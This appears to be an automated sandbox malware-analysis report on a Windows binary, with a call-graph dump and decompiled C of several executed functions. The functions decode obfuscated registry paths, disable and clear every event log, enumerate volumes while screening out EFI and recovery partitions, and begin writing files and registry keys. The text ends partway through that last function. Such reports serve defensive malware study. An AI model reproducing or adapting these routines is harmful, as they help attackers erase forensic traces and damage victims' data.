11046 d14a14 11045->11046 11046->10874 11048 d06830 RtlAllocateHeap 11047->11048 11049 d14b83 11048->11049 11050 d06830 RtlAllocateHeap 11049->11050 11051 d14bb0 11049->11051 11050->11049 11051->10877 11051->10882 11053 d06830 RtlAllocateHeap 11052->11053 11054 d14888 11053->11054 11054->10932 11056 d06830 RtlAllocateHeap 11055->11056 11057 d1482c 11056->11057 11057->10977 11059 d06830 RtlAllocateHeap 11058->11059 11060 d14928 11059->11060 11060->11015 11062 d06830 RtlAllocateHeap 11061->11062 11063 d13d0e 11062->11063 11063->10770 11066 d12a7d 11064->11066 11065 d12a81 11065->10779 11066->11065 11068 d128b0 11066->11068 11069 d128d7 11068->11069 11070 d097a8 4 API calls 11069->11070 11071 d128e7 11070->11071 11072 d097a8 4 API calls 11071->11072 11073 d128fb 11071->11073 11072->11073 11073->11065 11079 d16612 11074->11079 11075 d16b00 11076 d16b0e 11075->11076 11078 d0684c RtlFreeHeap 11075->11078 11076->9853 11077 d0684c RtlFreeHeap 11077->11075 11078->11076 11080 d06db0 RtlAllocateHeap 11079->11080 11083 d16670 11079->11083 11081 d16748 11080->11081 11082 d06830 RtlAllocateHeap 11081->11082 11081->11083 11082->11083 11083->11075 11083->11077 11085 d13703 11084->11085 11086 d12a54 4 API calls 11085->11086 11101 d13707 11085->11101 11088 d1371e 11086->11088 11087 d13845 11090 d13853 11087->11090 11092 d0684c RtlFreeHeap 11087->11092 11091 d06830 RtlAllocateHeap 11088->11091 11089 d0684c RtlFreeHeap 11089->11087 11093 d13861 11090->11093 11095 d0684c RtlFreeHeap 11090->11095 11094 d13728 11091->11094 11092->11090 11093->9860 11096 d0f788 2 API calls 11094->11096 11094->11101 11095->11093 11097 d13740 11096->11097 11098 d06830 RtlAllocateHeap 11097->11098 11097->11101 11099 d1375e 11098->11099 11100 d06830 RtlAllocateHeap 11099->11100 11099->11101 11100->11101 11101->11087 11101->11089 11103 d102ac 11102->11103 11104 d06830 RtlAllocateHeap 11103->11104 11105 d102cd 11104->11105 11105->9894

                  Executed Functions

                  Function 00D1946F Relevance: 52.0, APIs: 34, Instructions: 1050windowlibraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Create$Load$ErrorImageLast$CapsColorCommandDeviceFontFreeLibraryLineMenuPixelProcSelectTextWindow$AddressAttributesBitmapBrushButtonCheckedDialogFileHandleHeapInfoItemLocaleModuleObjectPaletteParamSolid
                  • String ID:
                  • API String ID: 2877282533-0
                  • Opcode ID: ab1045a4011ed16dd7fd85d30174bdd640bea705073515999f917add2180a517
                  • Instruction ID: 6af42618d866475875fab61754da20a6c93f539b40bb44dd1f88075e00803d9e
                  • Opcode Fuzzy Hash: ab1045a4011ed16dd7fd85d30174bdd640bea705073515999f917add2180a517
                  • Instruction Fuzzy Hash: 1301885499A344BDC210B7F1B80BBECA672EF62345F1910A9B0481A0F39E2044C0F23B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D09198 Relevance: 18.2, APIs: 12, Instructions: 241registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 76%
                  			E00D09198() {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v28;
				char _v32;
				short _v48;
				short _v76;
				char _v176;
				short _v292;
				short _v380;
				short _v900;
				intOrPtr* _t133;
				intOrPtr* _t135;
				intOrPtr* _t137;
				intOrPtr* _t139;
				intOrPtr* _t141;
				long _t145;
				long _t148;
				void* _t152;
				long _t157;
				long _t160;
				long _t163;
				long _t167;
				void* _t169;

				_t133 =  &_v292;
				 *_t133 = 0xb7b3406b;
				 *((intOrPtr*)(_t133 + 4)) = 0xb7a8407e;
				 *((intOrPtr*)(_t133 + 8)) = 0xb7bd406f;
				 *((intOrPtr*)(_t133 + 0xc)) = 0xb7b9406a;
				 *((intOrPtr*)(_t133 + 0x10)) = 0xb7b14064;
				 *((intOrPtr*)(_t133 + 0x14)) = 0xb79f4051;
				 *((intOrPtr*)(_t133 + 0x18)) = 0xb793404a;
				 *((intOrPtr*)(_t133 + 0x1c)) = 0xb793404b;
				 *((intOrPtr*)(_t133 + 0x20)) = 0xb788405e;
				 *((intOrPtr*)(_t133 + 0x24)) = 0xb7ab4064;
				 *((intOrPtr*)(_t133 + 0x28)) = 0xb7924051;
				 *((intOrPtr*)(_t133 + 0x2c)) = 0xb793405c;
				 *((intOrPtr*)(_t133 + 0x30)) = 0xb78f404f;
				 *((intOrPtr*)(_t133 + 0x34)) = 0xb7bf4064;
				 *((intOrPtr*)(_t133 + 0x38)) = 0xb78e404d;
				 *((intOrPtr*)(_t133 + 0x3c)) = 0xb799404a;
				 *((intOrPtr*)(_t133 + 0x40)) = 0xb7884056;
				 *((intOrPtr*)(_t133 + 0x44)) = 0xb799406e;
				 *((intOrPtr*)(_t133 + 0x48)) = 0xb78f404a;
				 *((intOrPtr*)(_t133 + 0x4c)) = 0xb7934051;
				 *((intOrPtr*)(_t133 + 0x50)) = 0xb7a04056;
				 *((intOrPtr*)(_t133 + 0x54)) = 0xb7b5406f;
				 *((intOrPtr*)(_t133 + 0x58)) = 0xb7b94076;
				 *((intOrPtr*)(_t133 + 0x5c)) = 0xb7a8406e;
				 *((intOrPtr*)(_t133 + 0x60)) = 0xb7bf4064;
				 *((intOrPtr*)(_t133 + 0x64)) = 0xb79d4050;
				 *((intOrPtr*)(_t133 + 0x68)) = 0xb7924056;
				 *((intOrPtr*)(_t133 + 0x6c)) = 0xb790405d;
				 *((intOrPtr*)(_t133 + 0x70)) = 0xb7fc404b;
				E00D01250(_t133, _t133, 0x1d);
				_t135 =  &_v380;
				 *_t135 = 0xb7a5406b;
				 *((intOrPtr*)(_t135 + 4)) = 0xb7a8406b;
				 *((intOrPtr*)(_t135 + 8)) = 0xb7b1407d;
				 *((intOrPtr*)(_t135 + 0xc)) = 0xb7bf4064;
				 *((intOrPtr*)(_t135 + 0x10)) = 0xb78e404d;
				 *((intOrPtr*)(_t135 + 0x14)) = 0xb799404a;
				 *((intOrPtr*)(_t135 + 0x18)) = 0xb7884056;
				 *((intOrPtr*)(_t135 + 0x1c)) = 0xb793407b;
				 *((intOrPtr*)(_t135 + 0x20)) = 0xb7884056;
				 *((intOrPtr*)(_t135 + 0x24)) = 0xb793404a;
				 *((intOrPtr*)(_t135 + 0x28)) = 0xb7af4054;
				 *((intOrPtr*)(_t135 + 0x2c)) = 0xb788405d;
				 *((intOrPtr*)(_t135 + 0x30)) = 0xb7af4064;
				 *((intOrPtr*)(_t135 + 0x34)) = 0xb78e405d;
				 *((intOrPtr*)(_t135 + 0x38)) = 0xb795404e;
				 *((intOrPtr*)(_t135 + 0x3c)) = 0xb799405b;
				 *((intOrPtr*)(_t135 + 0x40)) = 0xb7a0404b;
				 *((intOrPtr*)(_t135 + 0x44)) = 0xb78a407d;
				 *((intOrPtr*)(_t135 + 0x48)) = 0xb792405d;
				 *((intOrPtr*)(_t135 + 0x4c)) = 0xb7b0404c;
				 *((intOrPtr*)(_t135 + 0x50)) = 0xb79b4057;
				 *((intOrPtr*)(_t135 + 0x54)) = 0xb7fc4038;
				E00D01250(_t135, _t135, 0x16);
				_t137 =  &_v176;
				 *_t137 = 0xb7c64077;
				 *((intOrPtr*)(_t137 + 4)) = 0xb7bd407a;
				 *((intOrPtr*)(_t137 + 8)) = 0xb7c6407f;
				 *((intOrPtr*)(_t137 + 0xc)) = 0xb7a5406b;
				 *((intOrPtr*)(_t137 + 0x10)) = 0xb7c6407c;
				 *((intOrPtr*)(_t137 + 0x14)) = 0xb7bd4010;
				 *((intOrPtr*)(_t137 + 0x18)) = 0xb7c74003;
				 *((intOrPtr*)(_t137 + 0x1c)) = 0xb7844008;
				 *((intOrPtr*)(_t137 + 0x20)) = 0xb7c74009;
				 *((intOrPtr*)(_t137 + 0x24)) = 0xb7c74003;
				 *((intOrPtr*)(_t137 + 0x28)) = 0xb7a5406b;
				 *((intOrPtr*)(_t137 + 0x2c)) = 0xb7d44011;
				 *((intOrPtr*)(_t137 + 0x30)) = 0xb7c74079;
				 *((intOrPtr*)(_t137 + 0x34)) = 0xb7cc4003;
				 *((intOrPtr*)(_t137 + 0x38)) = 0xb7c94040;
				 *((intOrPtr*)(_t137 + 0x3c)) = 0xb7c74003;
				 *((intOrPtr*)(_t137 + 0x40)) = 0xb7be4003;
				 *((intOrPtr*)(_t137 + 0x44)) = 0xb7d54079;
				 *((intOrPtr*)(_t137 + 0x48)) = 0xb7bd4010;
				 *((intOrPtr*)(_t137 + 0x4c)) = 0xb7c74003;
				 *((intOrPtr*)(_t137 + 0x50)) = 0xb7844008;
				 *((intOrPtr*)(_t137 + 0x54)) = 0xb7c74009;
				 *((intOrPtr*)(_t137 + 0x58)) = 0xb7c74003;
				 *((intOrPtr*)(_t137 + 0x5c)) = 0xb7bd4074;
				 *((intOrPtr*)(_t137 + 0x60)) = 0xb7fc4011;
				E00D01250(_t137, _t137, 0x19);
				_t139 =  &_v48;
				 *_t139 = 0xb792407d;
				 *((intOrPtr*)(_t139 + 4)) = 0xb79e4059;
				 *((intOrPtr*)(_t139 + 8)) = 0xb7994054;
				 *((intOrPtr*)(_t139 + 0xc)) = 0xb7fc405c;
				E00D01250(_t139, _t139, 4);
				_t141 =  &_v76;
				 *_t141 = 0xb794407b;
				 *((intOrPtr*)(_t141 + 4)) = 0xb7924059;
				 *((intOrPtr*)(_t141 + 8)) = 0xb7994056;
				 *((intOrPtr*)(_t141 + 0xc)) = 0xb7bd4054;
				 *((intOrPtr*)(_t141 + 0x10)) = 0xb79f405b;
				 *((intOrPtr*)(_t141 + 0x14)) = 0xb78f405d;
				 *((intOrPtr*)(_t141 + 0x18)) = 0xb7fc404b;
				E00D01250(_t141, _t141, 7);
				_v8 = 0;
				_t145 = RegCreateKeyExW(0x80000002,  &_v292, 0, 0, 0, 0x2011f, 0,  &_v8, 0); // executed
				if(_t145 != 0) {
					L12:
					if(_v8 != 0) {
						 *0xd254d0(_v8);
					}
					_v8 = 0;
					_t148 = RegCreateKeyExW(0x80000002,  &_v380, 0, 0, 0, 0x2011f, 0,  &_v8, 0); // executed
					if(_t148 != 0) {
						L21:
						if(_v8 == 0) {
							return _t148;
						}
						return  *0xd254d0(_v8);
					} else {
						_v28 = 0;
						while(1) {
							_t148 = RegEnumKeyW(_v8, _v28,  &_v900, 0x104); // executed
							if(_t148 == 0x103) {
								break;
							}
							_t152 = OpenEventLogW(0,  &_v900); // executed
							_v16 = _t152;
							if(_v16 != 0) {
								ClearEventLogW(_v16, 0); // executed
								 *0xd25684(_v16);
							}
							_v28 = _v28 + 1;
						}
						goto L21;
					}
				} else {
					_v28 = 0;
					while(1) {
						_t157 = RegEnumKeyW(_v8, _v28,  &_v900, 0x104); // executed
						if(_t157 == 0x103) {
							goto L12;
						}
						_v12 = 0;
						_t160 = RegCreateKeyExW(_v8,  &_v900, 0, 0, 0, 0x2011f, 0,  &_v12, 0); // executed
						if(_t160 == 0) {
							_v32 = 0;
							_t163 = RegSetValueExW(_v12,  &_v48, 0, 4,  &_v32, 4); // executed
							if(_t163 == 0) {
								_t167 = RegSetValueExW(_v12,  &_v76, 0, 1,  &_v176, 0x64); // executed
								if(_t167 == 0) {
									_t169 = OpenEventLogW(0,  &_v900); // executed
									_v16 = _t169;
									if(_v16 != 0) {
										ClearEventLogW(_v16, 0); // executed
										CloseEventLog(_v16); // executed
									}
								}
							}
							if(_v12 != 0) {
								 *0xd254d0(_v12);
							}
						}
						_v28 = _v28 + 1;
					}
					goto L12;
				}
			}



























                  0x00d091a1
                  0x00d091a7
                  0x00d091ad
                  0x00d091b4
                  0x00d091bb
                  0x00d091c2
                  0x00d091c9
                  0x00d091d0
                  0x00d091d7
                  0x00d091de
                  0x00d091e5
                  0x00d091ec
                  0x00d091f3
                  0x00d091fa
                  0x00d09201
                  0x00d09208
                  0x00d0920f
                  0x00d09216
                  0x00d0921d
                  0x00d09224
                  0x00d0922b
                  0x00d09232
                  0x00d09239
                  0x00d09240
                  0x00d09247
                  0x00d0924e
                  0x00d09255
                  0x00d0925c
                  0x00d09263
                  0x00d0926a
                  0x00d09274
                  0x00d09279
                  0x00d0927f
                  0x00d09285
                  0x00d0928c
                  0x00d09293
                  0x00d0929a
                  0x00d092a1
                  0x00d092a8
                  0x00d092af
                  0x00d092b6
                  0x00d092bd
                  0x00d092c4
                  0x00d092cb
                  0x00d092d2
                  0x00d092d9
                  0x00d092e0
                  0x00d092e7
                  0x00d092ee
                  0x00d092f5
                  0x00d092fc
                  0x00d09303
                  0x00d0930a
                  0x00d09311
                  0x00d0931b
                  0x00d09320
                  0x00d09326
                  0x00d0932c
                  0x00d09333
                  0x00d0933a
                  0x00d09341
                  0x00d09348
                  0x00d0934f
                  0x00d09356
                  0x00d0935d
                  0x00d09364
                  0x00d0936b
                  0x00d09372
                  0x00d09379
                  0x00d09380
                  0x00d09387
                  0x00d0938e
                  0x00d09395
                  0x00d0939c
                  0x00d093a3
                  0x00d093aa
                  0x00d093b1
                  0x00d093b8
                  0x00d093bf
                  0x00d093c6
                  0x00d093cd
                  0x00d093d7
                  0x00d093dc
                  0x00d093df
                  0x00d093e5
                  0x00d093ec
                  0x00d093f3
                  0x00d093fd
                  0x00d09402
                  0x00d09405
                  0x00d0940b
                  0x00d09412
                  0x00d09419
                  0x00d09420
                  0x00d09427
                  0x00d0942e
                  0x00d09438
                  0x00d0943d
                  0x00d09463
                  0x00d0946b
                  0x00d0954d
                  0x00d09551
                  0x00d09556
                  0x00d09556
                  0x00d0955c
                  0x00d09582
                  0x00d0958a
                  0x00d095e5
                  0x00d095e9
                  0x00d095f7
                  0x00d095f7
                  0x00000000
                  0x00d0958c
                  0x00d0958c
                  0x00d09593
                  0x00d095a5
                  0x00d095b0
                  0x00000000
                  0x00000000
                  0x00d095bd
                  0x00d095c3
                  0x00d095ca
                  0x00d095d1
                  0x00d095da
                  0x00d095da
                  0x00d095e0
                  0x00d095e0
                  0x00000000
                  0x00d095b2
                  0x00d09471
                  0x00d09471
                  0x00d09478
                  0x00d0948a
                  0x00d09495
                  0x00d09497
                  0x00d09497
                  0x00d0949c
                  0x00d094c0
                  0x00d094c8
                  0x00d094ca
                  0x00d094e2
                  0x00d094ea
                  0x00d09500
                  0x00d09508
                  0x00d09513
                  0x00d09519
                  0x00d09520
                  0x00d09527
                  0x00d09530
                  0x00d09530
                  0x00d09520
                  0x00d09508
                  0x00d0953a
                  0x00d0953f
                  0x00d0953f
                  0x00d0953a
                  0x00d09545
                  0x00d09545
                  0x00000000
                  0x00d09478

                  APIs
                  • RegCreateKeyExW.KERNELBASE(80000002,?,00000000,00000000,00000000,0002011F,00000000,00000000,00000000,?,00000007,?,00000004,?,00000019,?), ref: 00D09463
                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000104), ref: 00D0948A
                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,0002011F,00000000,00000000,00000000), ref: 00D094C0
                  • RegSetValueExW.KERNELBASE(00000000,?,00000000,00000004,00000000,00000004), ref: 00D094E2
                  • RegSetValueExW.KERNELBASE(00000000,?,00000000,00000001,?,00000064), ref: 00D09500
                  • OpenEventLogW.ADVAPI32(00000000,?), ref: 00D09513
                  • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 00D09527
                  • CloseEventLog.ADVAPI32(00000000), ref: 00D09530
                  • RegCreateKeyExW.KERNELBASE(80000002,?,00000000,00000000,00000000,0002011F,00000000,00000000,00000000), ref: 00D09582
                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000104), ref: 00D095A5
                  • OpenEventLogW.ADVAPI32(00000000,?), ref: 00D095BD
                  • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 00D095D1
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Event$Create$ClearEnumOpenValue$Close
                  • String ID:
                  • API String ID: 3255277317-0
                  • Opcode ID: 31e878dd5f1f0c54d64bc752cf34a4c53ae5c08966af47d1d592cb6b6f2dde9f
                  • Instruction ID: 1b3a52fdd4614478388e64c729e5b5fa6de33bfb7f082c0af785e6bdc934dd95
                  • Opcode Fuzzy Hash: 31e878dd5f1f0c54d64bc752cf34a4c53ae5c08966af47d1d592cb6b6f2dde9f
                  • Instruction Fuzzy Hash: A9C1F9B0440304EFE755EF51E949F997B34FB22705F528898E128AF2B2D3768A45CF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0A65C Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190filenativeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 44 d0a65c-d0a6dc GetVolumeNameForVolumeMountPointW FindFirstVolumeW 48 d0a920-d0a925 44->48 49 d0a6e2-d0a6e8 44->49 50 d0a6ee-d0a6f5 49->50 51 d0a8ef-d0a911 49->51 50->51 52 d0a6fb-d0a712 GetVolumePathNamesForVolumeNameW 50->52 51->49 58 d0a917 51->58 52->51 54 d0a718-d0a71c 52->54 54->51 55 d0a722-d0a726 54->55 55->51 57 d0a72c-d0a736 GetDriveTypeW 55->57 59 d0a741-d0a749 call d01574 57->59 60 d0a738-d0a73b 57->60 58->48 63 d0a7c7-d0a7ed call d01700 CreateFileW 59->63 64 d0a74b-d0a793 59->64 60->51 60->59 68 d0a7f3-d0a819 DeviceIoControl 63->68 69 d0a8e6-d0a8e9 NtClose 63->69 74 d0a7b3-d0a7b7 64->74 75 d0a795-d0a7ae call d0a5d0 64->75 68->69 70 d0a81f-d0a826 68->70 69->51 72 d0a828-d0a834 70->72 73 d0a88c-d0a893 70->73 77 d0a853-d0a859 72->77 78 d0a836-d0a83d 72->78 73->69 76 d0a895-d0a89c 73->76 79 d0a7c2 74->79 80 d0a7b9 74->80 75->74 76->69 81 d0a89e-d0a8a5 76->81 84 d0a878-d0a885 call d016d0 call d0a5d0 77->84 85 d0a85b-d0a862 77->85 78->77 82 d0a83f-d0a846 78->82 79->51 80->79 81->69 86 d0a8a7-d0a8c1 call d016d0 81->86 82->77 87 d0a848-d0a84f 82->87 96 d0a88a 84->96 85->84 89 d0a864-d0a86b 85->89 100 d0a8c3-d0a8ca 86->100 101 d0a8da-d0a8e1 call d0a5d0 86->101 87->77 92 d0a851 87->92 89->84 93 d0a86d-d0a874 89->93 92->96 93->84 97 d0a876 93->97 96->69 97->96 102 d0a8d8 100->102 103 d0a8cc-d0a8d3 call d0a5d0 100->103 101->69 102->69 103->102
                  C-Code - Quality: 26%
                  			E00D0A65C() {
				intOrPtr _v8;
				void* _v12;
				long _v16;
				char _v144;
				char _v272;
				char _v792;
				char _v1312;
				char _v1423;
				char _v1424;
				void _v1456;
				intOrPtr _t53;
				void* _t57;
				int _t58;
				void* _t61;
				int _t65;
				void* _t68;
				intOrPtr* _t71;
				signed int _t74;
				WCHAR* _t75;
				void* _t78;
				short* _t81;
				WCHAR* _t85;
				void* _t86;
				void* _t88;

				 *0xd25444( &_v144, 0x7ffe0030);
				 *0xd25784( &_v144);
				 *0xd255b8( &_v144,  &_v1312, 0x104); // executed
				_t85 =  &_v792;
				_t81 =  &_v272;
				 *0xd25428(_t85, 0, 0x208);
				_t88 = _t86 + 0x14;
				_t53 =  *0xd255a4(_t85, 0x104); // executed
				_v8 = _t53;
				if(_v8 == 0) {
					return _t53;
				} else {
					goto L1;
				}
				do {
					L1:
					if( *_t85 == 0x5c005c && _t85[2] == 0x5c003f) {
						_v16 = 0;
						_t57 =  *0xd255b4(_t85, _t81, 0x40,  &_v16); // executed
						if(_t57 != 0 &&  *_t81 == 0 && _v16 == 1) {
							_t58 = GetDriveTypeW(_t85); // executed
							if(_t58 == 3 || _t58 == 2) {
								if(E00D01574() >= 0x3d) {
									E00D01700(_t85);
									_t61 = CreateFileW(_t85, 0x80000000, 3, 0, 3, 0x80, 0); // executed
									_v12 = _t61;
									if(_v12 != 0xffffffff) {
										_t65 = DeviceIoControl(_v12, 0x70048, 0, 0,  &_v1456, 0x90,  &_v16, 0); // executed
										if(_t65 != 0) {
											if(_v1456 != 1) {
												if(_v1456 == 0 && _v1424 != 0x27 && _v1423 != 1) {
													E00D016D0(_t85);
													_t68 =  *0xd25454( &_v1312, _t85);
													_t88 = _t88 + 8;
													if(_t68 != 1) {
														E00D0A5D0( *0xd2516c, _t85);
													} else {
														if(_v1424 == 0) {
															E00D0A5D0( *0xd2516c, _t85);
														}
													}
												}
											} else {
												_t71 =  &_v1424;
												if( *_t71 != 0xc12a7328 ||  *((intOrPtr*)(_t71 + 4)) != 0x11d2f81f ||  *((intOrPtr*)(_t71 + 8)) != 0xa0004bba ||  *((intOrPtr*)(_t71 + 0xc)) != 0x3bc93ec9) {
													if( *_t71 != 0xde94bba4 ||  *((intOrPtr*)(_t71 + 4)) != 0x4d4006d1 ||  *((intOrPtr*)(_t71 + 8)) != 0xd5bf6aa1 ||  *((intOrPtr*)(_t71 + 0xc)) != 0xacd67901) {
														E00D016D0(_t85);
														E00D0A5D0( *0xd2516c, _t85);
													}
												}
											}
										}
									}
									NtClose(_v12); // executed
								} else {
									_t74 =  *0xd2543c(_t85);
									_t88 = _t88 + 4;
									_t75 =  &(_t85[_t74]);
									 *_t75 = 0x6f0062;
									_t75[2] = 0x74006f;
									_t75[4] = 0x67006d;
									_t75[6] = 0x72;
									_v12 =  *0xd25528(_t85, 0x80000000, 3, 0, 3, 0x80, 0);
									if(_v12 == 0xffffffff) {
										_t78 =  *0xd25450(_t85, 0x5c);
										_t88 = _t88 + 8;
										 *((short*)(_t78 + 2)) = 0;
										E00D0A5D0( *0xd2516c, _t85);
									}
									if(_v12 != 0xffffffff) {
										 *0xd254d0(_v12);
									}
								}
							}
						}
					}
					 *0xd25428(_t85, 0, 0x208);
					_t88 = _t88 + 0xc;
					_push(0x104);
					_push(_t85);
					_push(_v8);
				} while ( *0xd255a8() != 0);
				return  *0xd255ac(_v8);
			}



























                  0x00d0a67d
                  0x00d0a68d
                  0x00d0a6a6
                  0x00d0a6ac
                  0x00d0a6b2
                  0x00d0a6c0
                  0x00d0a6c6
                  0x00d0a6cf
                  0x00d0a6d5
                  0x00d0a6dc
                  0x00d0a925
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00d0a6e2
                  0x00d0a6e2
                  0x00d0a6e8
                  0x00d0a6fb
                  0x00d0a70a
                  0x00d0a712
                  0x00d0a72d
                  0x00d0a736
                  0x00d0a749
                  0x00d0a7c8
                  0x00d0a7e0
                  0x00d0a7e6
                  0x00d0a7ed
                  0x00d0a811
                  0x00d0a819
                  0x00d0a826
                  0x00d0a893
                  0x00d0a8a8
                  0x00d0a8b5
                  0x00d0a8bb
                  0x00d0a8c1
                  0x00d0a8e1
                  0x00d0a8c3
                  0x00d0a8ca
                  0x00d0a8d3
                  0x00d0a8d3
                  0x00d0a8d8
                  0x00d0a8c1
                  0x00d0a828
                  0x00d0a828
                  0x00d0a834
                  0x00d0a859
                  0x00d0a879
                  0x00d0a885
                  0x00d0a885
                  0x00d0a859
                  0x00d0a88a
                  0x00d0a826
                  0x00d0a819
                  0x00d0a8e9
                  0x00d0a74b
                  0x00d0a74c
                  0x00d0a752
                  0x00d0a755
                  0x00d0a758
                  0x00d0a75e
                  0x00d0a765
                  0x00d0a76c
                  0x00d0a78c
                  0x00d0a793
                  0x00d0a798
                  0x00d0a79e
                  0x00d0a7a1
                  0x00d0a7ae
                  0x00d0a7ae
                  0x00d0a7b7
                  0x00d0a7bc
                  0x00d0a7bc
                  0x00d0a7c2
                  0x00d0a749
                  0x00d0a736
                  0x00d0a712
                  0x00d0a8f7
                  0x00d0a8fd
                  0x00d0a900
                  0x00d0a905
                  0x00d0a906
                  0x00d0a90f
                  0x00000000

                  APIs
                  • GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000104), ref: 00D0A6A6
                  • FindFirstVolumeW.KERNELBASE(?,00000104), ref: 00D0A6CF
                  • GetVolumePathNamesForVolumeNameW.KERNELBASE(?,?,00000040,00000000), ref: 00D0A70A
                  • GetDriveTypeW.KERNELBASE(?), ref: 00D0A72D
                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?), ref: 00D0A7E0
                  • DeviceIoControl.KERNELBASE(000000FF,00070048,00000000,00000000,?,00000090,00000001,00000000), ref: 00D0A811
                  • NtClose.NTDLL(000000FF), ref: 00D0A8E9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Volume$Name$CloseControlCreateDeviceDriveFileFindFirstMountNamesPathPointType
                  • String ID: '
                  • API String ID: 3318900191-1997036262
                  • Opcode ID: a44a6a51186d0544a4e5477ba43be30064faedd862d510b6bd4961d675435223
                  • Instruction ID: 4b0749ade65a93e04293abc583ad13bf2a05afe3d79414874a5a07277ea9f9d5
                  • Opcode Fuzzy Hash: a44a6a51186d0544a4e5477ba43be30064faedd862d510b6bd4961d675435223
                  • Instruction Fuzzy Hash: DA718A30800714EBDB319B54EC09F9ABB78EF11316F18C1A5E209A61E1D7749A86DF76
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0C354 Relevance: 12.2, APIs: 8, Instructions: 173registryfilenativeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 106 d0c354-d0c36e 107 d0c374-d0c389 call d06db0 106->107 108 d0c5a7-d0c5b0 106->108 107->108 111 d0c38f-d0c3a5 call d06830 107->111 114 d0c5a1-d0c5a2 call d0684c 111->114 115 d0c3ab-d0c3bc call d18ba4 111->115 114->108 119 d0c3c2-d0c443 call d016d0 CreateFileW 115->119 120 d0c59b-d0c59c call d0684c 115->120 119->120 126 d0c449-d0c45e WriteFile 119->126 120->114 127 d0c592 126->127 128 d0c464-d0c487 RegCreateKeyExW 126->128 127->120 128->127 129 d0c48d-d0c4b9 RegSetValueExW 128->129 131 d0c589-d0c58c NtClose 129->131 132 d0c4bf-d0c538 RegCreateKeyExW 129->132 131->127 132->131 135 d0c53a-d0c56c RegSetValueExW 132->135 135->131 137 d0c56e-d0c582 SHChangeNotify 135->137 137->131
                  C-Code - Quality: 43%
                  			E00D0C354(void* __ecx, void* __edx, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				long _v20;
				long _v24;
				short _v28;
				short _v92;
				char _v612;
				signed int _t50;
				void* _t65;
				int _t67;
				long _t70;
				long _t74;
				long _t82;
				long _t88;
				void* _t89;
				intOrPtr* _t96;
				char* _t98;
				intOrPtr* _t100;
				void* _t101;

				_v8 = 0;
				if( *0xd2512c == 0) {
					L15:
					return _v8;
				}
				_v28 = 0;
				_t101 = E00D06DB0(0xd1ba1c);
				if(_t101 == 0) {
					goto L15;
				}
				_t50 =  *0xd1ba18; // 0x146a
				_t89 = E00D06830(_t50 * 8);
				if(_t89 == 0) {
					L14:
					E00D0684C(_t101); // executed
					goto L15;
				}
				_push(_t89);
				_push(_t101);
				_v24 = E00D18BA4();
				if(_v24 == 0xffffffff) {
					L13:
					E00D0684C(_t89); // executed
					goto L14;
				}
				 *0xd25730(0,  &_v612, 0x23, 0); // executed
